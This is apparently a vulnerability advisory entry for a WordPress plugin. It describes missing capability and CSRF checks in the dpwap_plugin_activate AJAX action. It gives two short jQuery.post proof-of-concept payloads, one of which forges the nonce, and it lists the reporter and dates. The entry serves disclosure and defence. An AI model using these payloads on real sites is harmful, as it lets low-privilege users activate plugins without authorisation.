The plugin does not have capability and CSRF checks in the dpwap_plugin_activate AJAX action, allowing any authenticated users, such as subscribers, to activate plugins that are already installed.
v < 1.5.9 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php" }) v < 1.6.0 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php", nonce: base64('dpwap-metagauss') })
apple502j
apple502j
Yes
2021-10-19 (about 1 years ago)
2021-10-19 (about 1 years ago)
2022-04-08 (about 1 years ago)